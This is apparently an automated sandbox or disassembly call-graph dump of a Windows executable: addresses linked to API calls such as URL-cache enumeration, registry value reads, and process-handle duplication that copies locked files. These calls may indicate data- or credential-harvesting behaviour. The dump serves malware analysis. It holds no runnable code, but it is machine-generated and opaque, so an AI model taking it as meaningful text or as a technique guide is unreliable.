40a8ab 9 API calls 38936->38938 38937->38934 38939 40c373 GetLastError 38937->38939 38942 40c33e wcschr 38938->38942 38940 40c3ad FindCloseUrlCache 38939->38940 38941 40c37e 38939->38941 38940->38933 38943 40afcf 2 API calls 38941->38943 38942->38937 38944 40c34f 38942->38944 38945 40c391 FindNextUrlCacheEntryW 38943->38945 38946 40a8ab 9 API calls 38944->38946 38945->38934 38945->38940 38946->38937 39111 40a97a 38947->39111 38950 40a8cc 38950->38538 38951 40a8d0 7 API calls 38951->38950 39116 40b1ab ??3@YAXPAX ??3@YAXPAX 38952->39116 38954 40c3dd 38955 40b2cc 27 API calls 38954->38955 38956 40c3e7 38955->38956 39117 414592 RegOpenKeyExW 38956->39117 38958 40c3f4 38959 40c50e 38958->38959 38960 40c3ff 38958->38960 38974 405337 38959->38974 38961 40a9ce 4 API calls 38960->38961 38962 40c418 memset 38961->38962 39118 40aa1d 38962->39118 38965 40c471 38967 40c47a _wcsupr 38965->38967 38966 40c505 RegCloseKey 38966->38959 38968 40a8d0 7 API calls 38967->38968 38969 40c498 38968->38969 38970 40a8d0 7 API calls 38969->38970 38971 40c4ac memset 38970->38971 38972 40aa1d 38971->38972 38973 40c4e4 RegEnumValueW 38972->38973 38973->38966 38973->38967 39120 405220 38974->39120 38978 4099c6 2 API calls 38977->38978 38979 40a714 _wcslwr 38978->38979 38980 40c634 38979->38980 39177 405361 38980->39177 38983 40c65c wcslen 39180 4053b6 39 API calls 38983->39180 38984 40c71d wcslen 38984->38545 38986 40c677 38987 40c713 38986->38987 39181 40538b 39 API calls 38986->39181 39183 4053df 39 API calls 38987->39183 38990 40c6a5 38990->38987 38991 40c6a9 memset 38990->38991 38992 40c6d3 38991->38992 39182 40c589 43 API calls 38992->39182 38994->38546 38996 40ae18 9 API calls 38995->38996 39002 40c210 38996->39002 38997 40ae51 9 API calls 38997->39002 38998 40c264 38999 40aebe FindClose 38998->38999 39001 40c26f 38999->39001 39000 40add4 2 API calls 39000->39002 39007 40e5ed memset memset 39001->39007 39002->38997 39002->38998 39002->39000 39003 40c231 _wcsicmp 39002->39003 39004 40c1d3 35 API calls 39002->39004 39003->39002 39005 40c248 39003->39005 39004->39002 39020 40c084 22 API calls 39005->39020 39008 414c2e 16 API calls 39007->39008 39009 40e63f 39008->39009 39010 409d1f 6 API calls 39009->39010 39011 40e658 39010->39011 39021 409b98 GetFileAttributesW 39011->39021 39013 40e667 39014 40e680 39013->39014 39016 409d1f 6 API calls 39013->39016 39022 409b98 GetFileAttributesW 39014->39022 39016->39014 39017 40e68f 39018 40c2d8 39017->39018 39023 40e4b2 39017->39023 39018->38930 39018->38931 39020->39002 39021->39013 39022->39017 39044 40e01e 39023->39044 39025 40e593 39027 40e5b0 39025->39027 39028 40e59c DeleteFileW 39025->39028 39026 40e521 39026->39025 39067 40e175 39026->39067 39029 40b04b ??3@YAXPAX 39027->39029 39028->39027 39030 40e5bb 39029->39030 39032 40e5c4 CloseHandle 39030->39032 39033 40e5cc 39030->39033 39032->39033 39035 40b633 ??3@YAXPAX 39033->39035 39034 40e573 39036 40e584 39034->39036 39037 40e57c FindCloseChangeNotification 39034->39037 39038 40e5db 39035->39038 39110 40b1ab ??3@YAXPAX ??3@YAXPAX 39036->39110 39037->39036 39041 40b633 ??3@YAXPAX 39038->39041 39040 40e540 39040->39034 39087 40e2ab 39040->39087 39042 40e5e3 39041->39042 39042->39018 39045 406214 22 API calls 39044->39045 39046 40e03c 39045->39046 39047 40e16b 39046->39047 39048 40dd85 74 API calls 39046->39048 39047->39026 39049 40e06b 39048->39049 39049->39047 39050 40afcf ??2@YAPAXI ??3@YAXPAX 39049->39050 39051 40e08d OpenProcess 39050->39051 39052 40e0a4 GetCurrentProcess DuplicateHandle 39051->39052 39056 40e152 39051->39056 39053 40e0d0 GetFileSize 39052->39053 39054 40e14a CloseHandle 39052->39054 39057 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39053->39057 39054->39056 39055 40e160 39059 40b04b ??3@YAXPAX 39055->39059 39056->39055 39058 406214 22 API calls 39056->39058 39060 40e0ea 39057->39060 39058->39055 39059->39047 39061 4096dc CreateFileW 39060->39061 39062 40e0f1 CreateFileMappingW 39061->39062 39063 40e140 CloseHandle CloseHandle 39062->39063 39064 40e10b MapViewOfFile 39062->39064 39063->39054 39065 40e13b FindCloseChangeNotification 39064->39065 39066 40e11f WriteFile UnmapViewOfFile 39064->39066 39065->39063 39066->39065 39068 40e18c 39067->39068 39069 406b90 11 API calls 39068->39069 39070 40e19f 39069->39070 39071 40e1a7 memset 39070->39071 39072 40e299 39070->39072 39077 40e1e8 39071->39077 39073 4069a3 ??3@YAXPAX ??3@YAXPAX 39072->39073 39074 40e2a4 39073->39074 39074->39040 39075 406e8f 13 API calls 39075->39077 39076 406b53 SetFilePointerEx ReadFile 39076->39077 39077->39075 39077->39076 39078 40e283 39077->39078 39079 40dd50 _wcsicmp 39077->39079 39083 40742e 8 API calls 39077->39083 39084 40aae3 wcslen wcslen _memicmp 39077->39084 39085 40e244 _snwprintf 39077->39085 39080 40e291 39078->39080 39081 40e288 ??3@YAXPAX 39078->39081 39079->39077 39082 40aa04 ??3@YAXPAX 39080->39082 39081->39080 39082->39072 39083->39077 39084->39077 39086 40a8d0 7 API calls 39085->39086 39086->39077 39088 40e2c2 39087->39088 39089 406b90 11 API calls 39088->39089 39100 40e2d3 39089->39100 39090 40e4a0 39091 4069a3 ??3@YAXPAX ??3@YAXPAX 39090->39091 39093 40e4ab 39091->39093 39092 406e8f 13 API calls 39092->39100 39093->39040 39094 406b53 SetFilePointerEx ReadFile 39094->39100 39095 40e489 39096 40aa04 ??3@YAXPAX 39095->39096 39098 40e491 39096->39098 39097 40dd50 _wcsicmp 39097->39100 39098->39090 39099 40e497 ??3@YAXPAX 39098->39099 39099->39090 39100->39090 39100->39092 39100->39094 39100->39095 39100->39097 39101 40dd50 _wcsicmp 39100->39101 39104 40742e 8 API calls 39100->39104 39105 40e3e0 memcpy 39100->39105 39106 40e3b3 wcschr 39100->39106 39107 40e3fb memcpy 39100->39107 39108 40e416 memcpy 39100->39108 39109 40e431 memcpy 39100->39109 39102 40e376 memset 39101->39102 39103 40aa29 6 API calls 39102->39103 39103->39100 39104->39100 39105->39100 39106->39100 39107->39100 39108->39100 39109->39100 39110->39025 39113 40a980 39111->39113 39112 40a8bb 39112->38950 39112->38951 39113->39112 39114 40a995 _wcsicmp 39113->39114 39115 40a99c wcscmp 39113->39115 39114->39113 39115->39113 39116->38954 39117->38958 39119 40aa23 RegEnumValueW 39118->39119 39119->38965 39119->38966 39121 405335 39120->39121 39122 40522a 39120->39122 39121->38545 39123 40b2cc 27 API calls 39122->39123 39124 405234 39123->39124 39125 40a804 8 API calls 39124->39125 39126 40523a 39125->39126 39165 40b273 39126->39165 39128 405248 _mbscpy _mbscat GetProcAddress 39129 40b273 27 API calls 39128->39129 39130 405279 39129->39130 39168 405211 GetProcAddress 39130->39168 39132 405282 39133 40b273 27 API calls 39132->39133 39134 40528f 39133->39134 39169 405211 GetProcAddress 39134->39169 39136 405298 39137 40b273 27 API calls 39136->39137 39138 4052a5 39137->39138 39170 405211 GetProcAddress 39138->39170 39140 4052ae 39141 40b273 27 API calls 39140->39141 39142 4052bb 39141->39142 39171 405211 GetProcAddress 39142->39171 39144 4052c4 39145 40b273 27 API calls 39144->39145 39146 4052d1 39145->39146 39172 405211 GetProcAddress 39146->39172 39148 4052da 39149 40b273 27 API calls 39148->39149 39150 4052e7 39149->39150 39173 405211 GetProcAddress 39150->39173 39152 4052f0 39153 40b273 27 API calls 39152->39153 39154 4052fd 39153->39154 39174 405211 GetProcAddress 39154->39174 39156 405306 39157 40b273 27 API calls 39156->39157 39158 405313 39157->39158 39175 405211 GetProcAddress 39158->39175 39160 40531c 39166 40b58d 27 API calls 39165->39166 39167 40b18c 39166->39167 39167->39128 39168->39132 39169->39136 39170->39140 39171->39144 39172->39148 39173->39152 39174->39156 39175->39160 39178 405220 39 API calls 39177->39178 39179 405369 39178->39179 39179->38983 39179->38984 39180->38986 39181->38990 39182->38987 39183->38984 39185 40440c FreeLibrary 39184->39185 39186 40436d 39185->39186 39187 40a804 8 API calls 39186->39187 39188 404377 39187->39188 39189 404383 39188->39189 39190 404405 39188->39190 39191 40b273 27 API calls 39189->39191 39190->38557 39190->38559 39190->38560 39192 40438d GetProcAddress 39191->39192 39193 40b273 27 API calls 39192->39193 39194 4043a7 GetProcAddress 39193->39194 39195 40b273 27 API calls 39194->39195 39196 4043ba GetProcAddress 39195->39196 39197 40b273 27 API calls 39196->39197 39198 4043ce GetProcAddress 39197->39198 39199 40b273 27 API calls 39198->39199 39200 4043e2 GetProcAddress 39199->39200 39201 4043f1 39200->39201 39202 4043f7 39201->39202 39203 40440c FreeLibrary 39201->39203 39202->39190 39203->39190 39205 404413 FreeLibrary 39204->39205 39206 40441e 39204->39206 39205->39206 39206->38574 39207->38565 39209 40442e 39208->39209 39210 40447e 39208->39210 39211 40b2cc 27 API calls 39209->39211 39210->38565 39212 404438 39211->39212 39213 40a804 8 API calls 39212->39213 39214 40443e 39213->39214 39215 404445 39214->39215 39216 404467 39214->39216 39217 40b273 27 API calls 39215->39217 39216->39210 39218 404475 FreeLibrary 39216->39218 39219 40444f GetProcAddress 39217->39219 39218->39210 39219->39216 39220 404460 39219->39220 39220->39216 39222 4135f6 39221->39222 39223 4135eb FreeLibrary 39221->39223 39222->38577 39223->39222 39225 4449c4 39224->39225 39226 444a52 39224->39226 39227 40b2cc 27 API calls 39225->39227 39226->38594 39226->38595 39228 4449cb 39227->39228 39229 40a804 8 API calls 39228->39229 39230 4449d1 39229->39230 39231 40b273 27 API calls 39230->39231 39232 4449dc GetProcAddress 39231->39232 39233 40b273 27 API calls 39232->39233 39234 4449f3 GetProcAddress 39233->39234 39235 40b273 27 API calls 39234->39235 39236 444a04 GetProcAddress 39235->39236 39237 40b273 27 API calls 39236->39237 39238 444a15 GetProcAddress 39237->39238 39239 40b273 27 API calls 39238->39239 39240 444a26 GetProcAddress 39239->39240 39245->38605 39246->38605 39247->38605 39248->38605 39249->38596 39251 403a29 39250->39251 39265 403bed memset memset 39251->39265 39253 403ae7 39278 40b1ab ??3@YAXPAX ??3@YAXPAX 39253->39278 39254 403a3f memset 39260 403a2f 39254->39260 39256 403aef 39256->38613 39257 409b98 GetFileAttributesW 39257->39260 39258 40a8d0 7 API calls 39258->39260 39259 409d1f 6 API calls 39259->39260 39260->39253 39260->39254 39260->39257 39260->39258 39260->39259 39262 40a051 GetFileTime FindCloseChangeNotification 39261->39262 39263 4039ca CompareFileTime 39261->39263 39262->39263 39263->38613 39264->38612 39266 414c2e 16 API calls 39265->39266 39267 403c38 39266->39267 39268 409719 2 API calls 39267->39268 39269 403c3f wcscat 39268->39269 39270 414c2e 16 API calls 39269->39270 39271 403c61 39270->39271 39272 409719 2 API calls 39271->39272 39273 403c68 wcscat 39272->39273 39279 403af5 39273->39279 39276 403af5 20 API calls 39277 403c95 39276->39277 39277->39260 39278->39256 39280 403b02 39279->39280 39281 40ae18 9 API calls 39280->39281 39289 403b37 39281->39289 39282 403bdb 39284 40aebe FindClose 39282->39284 39283 40add4 wcscmp wcscmp 39283->39289 39285 403be6 39284->39285 39285->39276 39286 40ae18 9 API calls 39286->39289 39287 40ae51 9 API calls 39287->39289 39288 40aebe FindClose 39288->39289 39289->39282 39289->39283 39289->39286 39289->39287 39289->39288 39290 40a8d0 7 API calls 39289->39290 39290->39289 39292 409d1f 6 API calls 39291->39292 39293 404190 39292->39293 39306 409b98 GetFileAttributesW 39293->39306 39295 40419c 39296 4041a7 6 API calls 39295->39296 39297 40435c 39295->39297 39298 40424f 39296->39298 39297->38639 39298->39297 39300 40425e memset 39298->39300 39302 409d1f 6 API calls 39298->39302 39303 40a8ab 9 API calls 39298->39303 39307 414842 39298->39307 39300->39298 39301 404296 wcscpy 39300->39301 39301->39298 39302->39298 39304 4042b6 memset memset _snwprintf wcscpy 39303->39304 39304->39298 39305->38637 39306->39295 39310 41443e 39307->39310 39309 414866 39309->39298 39311 41444b 39310->39311 39312 414451 39311->39312 39313 4144a3 GetPrivateProfileStringW 39311->39313 39314 414491 39312->39314 39315 414455 wcschr 39312->39315 39313->39309 39316 414495 WritePrivateProfileStringW 39314->39316 39315->39314 39317 414463 _snwprintf 39315->39317 39316->39309 39317->39316 39318->38643 39320 40b2cc 27 API calls 39319->39320 39321 409615 39320->39321 39322 409d1f 6 API calls 39321->39322 39323 409625 39322->39323 39348 409b98 GetFileAttributesW 39323->39348 39325 409634 39326 409648 39325->39326 39349 4091b8 memset 39325->39349 39328 40b2cc 27 API calls 39326->39328 39330 408801 39326->39330 39329 40965d 39328->39329 39331 409d1f 6 API calls 39329->39331 39330->38646 39330->38647 39332 40966d 39331->39332 39401 409b98 GetFileAttributesW 39332->39401 39334 40967c 39334->39330 39335 409681 39334->39335 39402 409529 72 API calls 39335->39402 39337 409690 39337->39330 39348->39325 39403 40a6e6 WideCharToMultiByte 39349->39403 39351 409202 39404 444432 39351->39404 39354 40b273 27 API calls 39355 409236 39354->39355 39450 438552 39355->39450 39358 409383 39360 40b273 27 API calls 39358->39360 39362 409399 39360->39362 39364 438552 134 API calls 39362->39364 39381 40951d 39381->39326 39401->39334 39402->39337 39403->39351 39500 4438b5 39404->39500 39406 44444c 39412 409215 39406->39412 39514 415a6d 39406->39514 39408 4442e6 11 API calls 39410 44469e 39408->39410 39409 444486 39411 4444b9 memcpy 39409->39411 39449 4444a4 39409->39449 39410->39412 39414 443d90 111 API calls 39410->39414 39518 415258 39411->39518 39412->39354 39412->39381 39414->39412 39415 444524 39416 444541 39415->39416 39417 44452a 39415->39417 39521 444316 39416->39521 39418 416935 16 API calls 39417->39418 39418->39449 39449->39408 39588 438460 39450->39588 39452 409240 39452->39358 39453 4251c4 39452->39453 39600 424f07 39453->39600 39501 4438d0 39500->39501 39511 4438c9 39500->39511 39502 415378 memcpy memcpy 39501->39502 39503 4438d5 39502->39503 39504 4154e2 10 API calls 39503->39504 39505 443906 39503->39505 39503->39511 39504->39505 39506 443970 memset 39505->39506 39505->39511 39509 44398b 39506->39509 39507 4439a0 39508 415700 10 API calls 39507->39508 39507->39511 39512 4439c0 39508->39512 39509->39507 39510 41975c 10 API calls 39509->39510 39510->39507 39511->39406 39512->39511 39513 418981 10 API calls 39512->39513 39513->39511 39515 415a77 39514->39515 39516 415a8d 39515->39516 39517 415a7e memset 39515->39517 39516->39409 39517->39516 39519 4438b5 11 API calls 39518->39519 39520 41525d 39519->39520 39520->39415 39522 444328 39521->39522 39523 444423 39522->39523 39524 44434e 39522->39524 39525 4446ea 11 API calls 39523->39525 39526 432d4e memset memset memcpy 39524->39526 39532 444381 39525->39532 39527 44435a 39526->39527 39589 41703f 11 API calls 39588->39589 39590 43847a 39589->39590 39591 43848a 39590->39591 39592 43847e 39590->39592 39594 438270 134 API calls 39591->39594 39593 4446ea 11 API calls 39592->39593 39596 438488 39593->39596 39595 4384aa 39594->39595 39595->39596 39597 424f26 123 API calls 39595->39597 39596->39452 39598 4384bb 39597->39598 39599 438270 134 API calls 39598->39599 39599->39596 39601 424f1f 39600->39601 39602 424f0c 39600->39602 39604 424eea 11 API calls 39601->39604 39603 416760 11 API calls 39602->39603 39657 413f4f 39630->39657 39633 413f37 K32GetModuleFileNameExW 39634 413f4a 39633->39634 39634->38705 39636 413969 wcscpy 39635->39636 39637 41396c wcschr 39635->39637 39649 413a3a 39636->39649 39637->39636 39639 41398e 39637->39639 39662 4097f7 wcslen wcslen _memicmp 39639->39662 39641 41399a 39642 4139a4 memset 39641->39642 39643 4139e6 39641->39643 39663 409dd5 GetWindowsDirectoryW wcscpy 39642->39663 39645 413a31 wcscpy 39643->39645 39646 4139ec memset 39643->39646 39645->39649 39664 409dd5 GetWindowsDirectoryW wcscpy 39646->39664 39647 4139c9 wcscpy wcscat 39647->39649 39649->38705 39650 413a11 memcpy wcscat 39650->39649 39652 413cb0 GetModuleHandleW 39651->39652 39653 413cda 39651->39653 39652->39653 39654 413cbf GetProcAddress 39652->39654 39655 413ce3 GetProcessTimes 39653->39655 39656 413cf6 39653->39656 39654->39653 39655->38708 39656->38708 39658 413f2f 39657->39658 39659 413f54 39657->39659 39658->39633 39658->39634 39660 40a804 8 API calls 39659->39660 39661 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39660->39661 39661->39658 39662->39641 39663->39647 39664->39650 39665->38729 39666->38752 39668 409cf9 GetVersionExW 39667->39668 39669 409d0a 39667->39669 39668->39669 39669->38758 39669->38762 39670->38764 39671->38767 39672->38769 39673->38834 39675 40bba5 39674->39675 39722 40cc26 39675->39722 39678 40bd4b 39743 40cc0c 39678->39743 39683 40b2cc 27 API calls 39684 40bbef 39683->39684 39750 40ccf0 _wcsicmp 39684->39750 39686 40bbf5 39686->39678 39751 40ccb4 6 API calls 39686->39751 39688 40bc26 39689 40cf04 17 API calls 39688->39689 39690 40bc2e 39689->39690 39691 40bd43 39690->39691 39692 40b2cc 27 API calls 39690->39692 39693 40cc0c 4 API calls 39691->39693 39694 40bc40 39692->39694 39693->39678 39752 40ccf0 _wcsicmp 39694->39752 39696 40bc46 39696->39691 39697 40bc61 memset memset WideCharToMultiByte 39696->39697 39753 40103c strlen 39697->39753 39699 40bcc0 39700 40b273 27 API calls 39699->39700 39701 40bcd0 memcmp 39700->39701 39701->39691 39702 40bce2 39701->39702 39703 404423 37 API calls 39702->39703 39704 40bd10 39703->39704 39704->39691 39705 40bd3a LocalFree 39704->39705 39706 40bd1f memcpy 39704->39706 39705->39691 39706->39705 39707->38849 39709 409a74 GetTempFileNameW 39708->39709 39710 409a66 GetWindowsDirectoryW 39708->39710 39709->38848 39710->39709 39711->38886 39712->38886 39713->38886 39714->38886 39715->38886 39716->38886 39717->38886 39718->38886 39719->38886 39720->38861 39721->38883 39754 4096c3 CreateFileW 39722->39754 39724 40cc34 39725 40cc3d GetFileSize 39724->39725 39733 40bbca 39724->39733 39726 40afcf 2 API calls 39725->39726 39727 40cc64 39726->39727 39755 40a2ef ReadFile 39727->39755 39729 40cc71 39756 40ab4a MultiByteToWideChar 39729->39756 39731 40cc95 FindCloseChangeNotification 39732 40b04b ??3@YAXPAX 39731->39732 39732->39733 39733->39678 39734 40cf04 39733->39734 39735 40b633 ??3@YAXPAX 39734->39735 39736 40cf14 39735->39736 39762 40b1ab ??3@YAXPAX ??3@YAXPAX 39736->39762 39738 40bbdd 39738->39678 39738->39683 39739 40cf1b 39739->39738 39741 40cfef 39739->39741 39763 40cd4b 39739->39763 39742 40cd4b 14 API calls 39741->39742 39742->39738 39744 40b633 ??3@YAXPAX 39743->39744 39745 40cc15 39744->39745 39746 40aa04 ??3@YAXPAX 39745->39746 39747 40cc1d 39746->39747 39812 40b1ab ??3@YAXPAX ??3@YAXPAX 39747->39812 39749 40b7d4 memset CreateFileW 39749->38841 39749->38842 39750->39686 39751->39688 39752->39696 39753->39699 39754->39724 39755->39729 39757 40ab6b 39756->39757 39761 40ab93 39756->39761 39758 40a9ce 4 API calls 39757->39758 39759 40ab74 39758->39759 39760 40ab7c MultiByteToWideChar 39759->39760 39760->39761 39761->39731 39762->39739 39764 40cd7b 39763->39764 39797 40aa29 39764->39797 39766 40cef5 39767 40aa04 ??3@YAXPAX 39766->39767 39768 40cefd 39767->39768 39768->39739 39770 40aa29 6 API calls 39771 40ce1d 39770->39771 39772 40aa29 6 API calls 39771->39772 39773 40ce3e 39772->39773 39774 40ce6a 39773->39774 39805 40abb7 wcslen memmove 39773->39805 39775 40ce9f 39774->39775 39808 40abb7 wcslen memmove 39774->39808 39777 40a8d0 7 API calls 39775->39777 39780 40ceb5 39777->39780 39778 40ce56 39806 40aa71 wcslen 39778->39806 39787 40a8d0 7 API calls 39780->39787 39782 40ce8b 39809 40aa71 wcslen 39782->39809 39784 40ce5e 39807 40abb7 wcslen memmove 39784->39807 39785 40ce93 39810 40abb7 wcslen memmove 39785->39810 39789 40cecb 39787->39789 39811 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39789->39811 39791 40cedd 39792 40aa04 ??3@YAXPAX 39791->39792 39793 40cee5 39792->39793 39794 40aa04 ??3@YAXPAX 39793->39794 39795 40ceed 39794->39795 39796 40aa04 ??3@YAXPAX 39795->39796 39796->39766 39798 40aa33 39797->39798 39799 40aa63 39797->39799 39800 40aa44 39798->39800 39801 40aa38 wcslen 39798->39801 39799->39766 39799->39770 39802 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39800->39802 39801->39800 39803 40aa4d 39802->39803 39803->39799 39804 40aa51 memcpy 39803->39804 39804->39799 39805->39778 39806->39784 39807->39774 39808->39782 39809->39785 39810->39775 39811->39791 39812->39749 39813->38901 39814->38909 37851 44188c 147 API calls 37669 44dea5 37670 44deb5 FreeLibrary 37669->37670 37671 44dec3 37669->37671 37670->37671 39874 4148b6 FindResourceW 39875 4148f9 39874->39875 39876 4148cf SizeofResource 39874->39876 39876->39875 39877 4148e0 LoadResource 39876->39877 39877->39875 39878 4148ee LockResource 39877->39878 39878->39875 39815 442774 39816 442799 39815->39816 39817 44277b 39815->39817 39840 42bf4c 14 API calls 39816->39840 39832 42b63e 39817->39832 39821 4427a5 39841 42bfcf memcpy 39821->39841 39824 4427ba 39842 42c00a 11 API calls 39824->39842 39826 441897 39827 4418ea 39826->39827 39828 442bd4 39826->39828 39829 4418e2 39826->39829 39828->39827 39844 441409 memset 39828->39844 39829->39827 39843 4414a9 12 API calls 39829->39843 39845 42b4ec 39832->39845 39834 42b64c 39851 42b5e4 39834->39851 39836 42b65e 39837 42b66d 39836->39837 39858 42b3c6 11 API calls 39836->39858 39839 42b1b5 17 API calls 39837->39839 39839->39816 39840->39821 39841->39824 39842->39826 39843->39827 39844->39828 39846 42b4ff 39845->39846 39859 415a91 39846->39859 39849 42b553 memcpy 39850 42b545 39849->39850 39850->39834 39852 42b5eb 39851->39852 39856 42b604 39851->39856 39863 42b896 memset 39852->39863 39854 42b5f5 39864 42b896 memset 39854->39864 39856->39836 39857 42b5ff 39857->39836 39858->39837 39860 415a9d 39859->39860 39861 415ab3 39860->39861 39862 415aa4 memset 39860->39862 39861->39849 39861->39850 39862->39861 39863->39854 39864->39857 37845 415304 ??3@YAXPAX 37852 441892 147 API calls 37852->37852 39879 441b3f 39889 43a9f6 39879->39889 39881 441b61 40062 4386af memset 39881->40062 39883 44189a 39884 4418e2 39883->39884 39888 442bd4 39883->39888 39886 4418ea 39884->39886 40063 4414a9 12 API calls 39884->40063 39888->39886 40064 441409 memset 39888->40064 39890 43aa20 39889->39890 39891 43aadf 39889->39891 39890->39891 39892 43aa34 memset 39890->39892 39891->39881 39893 43aa56 39892->39893 39894 43aa4d 39892->39894 40065 43a6e7 39893->40065 40073 42c02e memset 39894->40073 39899 43aad3 40075 4169a7 11 API calls 39899->40075 39900 43aaae 39900->39891 39900->39899 39915 43aae5 39900->39915 39901 43ac18 39904 43ac47 39901->39904 40077 42bbd5 memcpy memcpy memcpy memset memcpy 39901->40077 39905 43aca8 39904->39905 40078 438eed 16 API calls 39904->40078 39909 43acd5 39905->39909 40080 4233ae 11 API calls 39905->40080 39908 43ac87 40079 4233c5 16 API calls 39908->40079 40081 423426 11 API calls 39909->40081 39913 43ace1 40082 439811 163 API calls 39913->40082 39914 43a9f6 161 API calls 39914->39915 39915->39891 39915->39901 39915->39914 40076 439bbb 22 API calls 39915->40076 39917 43acfd 39922 43ad2c 39917->39922 40083 438eed 16 API calls 39917->40083 39919 43ad19 40084 4233c5 16 API calls 39919->40084 39921 43ad58 40085 44081d 163 API calls 39921->40085 39922->39921 39925 43add9 39922->39925 40089 423426 11 API calls 39925->40089 39926 43ae3a memset 39927 43ae73 39926->39927 40090 42e1c0 147 API calls 39927->40090 39928 43adab 40087 438c4e 163 API calls 39928->40087 39929 43ad6c 39929->39891 39929->39928 40086 42370b memset memcpy memset 39929->40086 39933 43adcc 40088 440f84 12 API calls 39933->40088 39934 43ae96 40091 42e1c0 147 API calls 39934->40091 39937 43aea8 39938 43aec1 39937->39938 40092 42e199 147 API calls 39937->40092 39939 43af00 39938->39939 40093 42e1c0 147 API calls 39938->40093 39939->39891 39943 43af1a 39939->39943 39944 43b3d9 39939->39944 40094 438eed 16 API calls 39943->40094 39949 43b3f6 39944->39949 39950 43b4c8 39944->39950 39945 43b60f 39945->39891 40153 4393a5 17 API calls 39945->40153 39948 43af2f 40095 4233c5 16 API calls 39948->40095 40135 432878 12 API calls 39949->40135 39959 43b4f2 39950->39959 40141 42bbd5 memcpy memcpy memcpy memset memcpy 39950->40141 39952 43af51 40096 423426 11 API calls 39952->40096 39955 43af7d 40097 423426 11 API calls 39955->40097 40142 43a76c 21 API calls 39959->40142 39960 43b529 40143 44081d 163 API calls 39960->40143 39961 43b462 40137 423330 11 API calls 39961->40137 39962 43af94 40098 423330 11 API calls 39962->40098 39966 43afca 40099 423330 11 API calls 39966->40099 39967 43b47e 39971 43b497 39967->39971 40138 42374a memcpy memset memcpy memcpy memcpy 39967->40138 39968 43b544 39972 43b55c 39968->39972 40144 42c02e memset 39968->40144 39969 43b428 39969->39961 40136 432b60 16 API calls 39969->40136 40139 4233ae 11 API calls 39971->40139 40145 43a87a 163 API calls 39972->40145 39974 43afdb 40100 4233ae 11 API calls 39974->40100 39979 43b56c 39983 43b58a 39979->39983 40146 423330 11 API calls 39979->40146 39980 43b4b1 40140 423399 11 API calls 39980->40140 39982 43afee 40101 44081d 163 API calls 39982->40101 40147 440f84 12 API calls 39983->40147 39984 43b4c1 40149 42db80 163 API calls 39984->40149 39989 43b592 40148 43a82f 16 API calls 39989->40148 39992 43b5b4 40150 438c4e 163 API calls 39992->40150 39994 43b5cf 40151 42c02e memset 39994->40151 39996 43b005 39996->39891 40000 43b01f 39996->40000 40102 42d836 163 API calls 39996->40102 39997 43b1ef 40112 4233c5 16 API calls 39997->40112 40000->39997 40110 423330 11 API calls 40000->40110 40111 42d71d 163 API calls 40000->40111 40001 43b212 40113 423330 11 API calls 40001->40113 40003 43b087 40103 4233ae 11 API calls 40003->40103 40004 43add4 40004->39945 40152 438f86 16 API calls 40004->40152 40007 43b22a 40114 42ccb5 11 API calls 40007->40114 40010 43b23f 40115 4233ae 11 API calls 40010->40115 40011 43b10f 40106 423330 11 API calls 40011->40106 40013 43b257 40116 4233ae 11 API calls 40013->40116 40017 43b129 40107 4233ae 11 API calls 40017->40107 40018 43b26e 40117 4233ae 11 API calls 40018->40117 40021 43b09a 40021->40011 40104 42cc15 19 API calls 40021->40104 40105 4233ae 11 API calls 40021->40105 40022 43b282 40118 43a87a 163 API calls 40022->40118 40024 43b13c 40108 440f84 12 API calls 40024->40108 40026 43b29d 40119 423330 11 API calls 40026->40119 40029 43b15f 40109 4233ae 11 API calls 40029->40109 40030 43b2af 40031 43b2b8 40030->40031 40032 43b2ce 40030->40032 40120 4233ae 11 API calls 40031->40120 40121 440f84 12 API calls 40032->40121 40036 43b2c9 40123 4233ae 11 API calls 40036->40123 40037 43b2da 40122 42370b memset memcpy memset 40037->40122 40040 43b2f9 40124 423330 11 API calls 40040->40124 40042 43b30b 40125 423330 11 API calls 40042->40125 40044 43b325 40126 423399 11 API calls 40044->40126 40046 43b332 40127 4233ae 11 API calls 40046->40127 40048 43b354 40128 423399 11 API calls 40048->40128 40050 43b364 40129 43a82f 16 API calls 40050->40129 40052 43b370 40130 42db80 163 API calls 40052->40130 40054 43b380 40131 438c4e 163 API calls 40054->40131 40056 43b39e 40132 423399 11 API calls 40056->40132 40058 43b3ae 40133 43a76c 21 API calls 40058->40133 40060 43b3c3 40134 423399 11 API calls 40060->40134 40062->39883 40063->39886 40064->39888 40066 43a6f5 40065->40066 40068 43a765 40065->40068 40066->40068 40154 42a115 40066->40154 40068->39891 40074 4397fd memset 40068->40074 40071 43a73d 40071->40068 40072 42a115 147 API calls 40071->40072 40072->40068 40073->39893 40074->39900 40075->39891 40076->39915 40077->39904 40078->39908 40079->39905 40080->39909 40081->39913 40082->39917 40083->39919 40084->39922 40085->39929 40086->39928 40087->39933 40088->40004 40089->39926 40090->39934 40091->39937 40092->39938 40093->39938 40094->39948 40095->39952 40096->39955 40097->39962 40098->39966 40099->39974 40100->39982 40101->39996 40102->40003 40103->40021 40104->40021 40105->40021 40106->40017 40107->40024 40108->40029 40109->40000 40110->40000 40111->40000 40112->40001 40113->40007 40114->40010 40115->40013 40116->40018 40117->40022 40118->40026 40119->40030 40120->40036 40121->40037 40122->40036 40123->40040 40124->40042 40125->40044 40126->40046 40127->40048 40128->40050 40129->40052 40130->40054 40131->40056 40132->40058 40133->40060 40134->40004 40135->39969 40136->39961 40137->39967 40138->39971 40139->39980 40140->39984 40141->39959 40142->39960 40143->39968 40144->39972 40145->39979 40146->39983 40147->39989 40148->39984 40149->39992 40150->39994 40151->40004 40152->39945 40153->39891 40155 42a175 40154->40155 40157 42a122 40154->40157 40155->40068 40160 42b13b 147 API calls 40155->40160 40157->40155 40158 42a115 147 API calls 40157->40158 40161 43a174 40157->40161 40185 42a0a8 147 API calls 40157->40185 40158->40157 40160->40071 40175 43a196 40161->40175 40176 43a19e 40161->40176 40162 43a306 40162->40175 40201 4388c4 14 API calls 40162->40201 40165 42a115 147 API calls 40165->40176 40166 415a91 memset 40166->40176 40167 43a642 40167->40175 40204 4169a7 11 API calls 40167->40204 40171 43a635 40203 42c02e memset 40171->40203 40175->40157 40176->40162 40176->40165 40176->40166 40176->40175 40186 42ff8c 40176->40186 40194 4165ff 40176->40194 40197 439504 13 API calls 40176->40197 40198 4312d0 147 API calls 40176->40198 40199 42be4c memcpy memcpy 